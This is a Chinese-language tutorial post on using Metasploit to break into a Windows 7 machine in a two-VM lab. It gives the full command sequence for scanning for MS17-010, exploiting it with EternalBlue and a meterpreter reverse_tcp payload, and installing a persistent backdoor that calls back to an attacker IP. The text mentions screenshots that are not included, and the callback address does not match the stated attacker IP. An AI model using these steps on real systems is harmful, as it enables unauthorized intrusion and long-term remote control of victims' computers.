使用MSF入侵win7并生成后門控制
VSole2021-10-22 08:12:00
攻擊主機系統:kali Linux 192.168.102.16
目標主機系統:win7 192.168.102.17
兩臺主機均在虛擬機,同一局域網內互通。
首先啟動Metasploit
命令 Msfconsole

Msf啟動后會發現很多模塊,對于win7的話我們先嘗試永恒之藍漏洞來入侵,通過命令查找MS17_010漏洞相關的信息:
Search ms17_010
輸入命令后查找結果如圖所示,找到了四個模塊。其中有探測板塊和利用板塊。

先探測一下有哪些主機存在漏洞。
選擇這個輔助模塊:
use auxiliary/scanner/smb/smb_ms17_010
設置要探測主機的ip或ip范圍:
set RHOSTS 192.168.102.17
輸入exploit開始探測。
前面顯示+號的就是可能存在漏洞的主機。可看到探測回顯我們的主機存在ms17_010漏洞
既然得知存在漏洞那么接下來就是漏洞利用。 選擇漏洞利用之前我們需要選擇payloads
其實應該使用show options查看一下需要設置的參數,這里忽略了這一步。
查看payloads:
show payloads
選擇漏洞利用模塊:
use exploit/windows/smb/ms17_010_eternalblue
設置payload:
set payload windows/x64/meterpreter/reverse_tcp
如果不設置RPORT的話,默認使用4444端口監聽,這里就不設置了。
輸入exploit或者run開始攻擊。
可見上圖我們已經利用成功 meterpreter常見命令和參數 輸入screenshot截屏
接下來通過服務啟動生成一個持續性后門。
run persistence -X -i 5 -p 8888 -r 192.168.113.133

VSole
網絡安全專家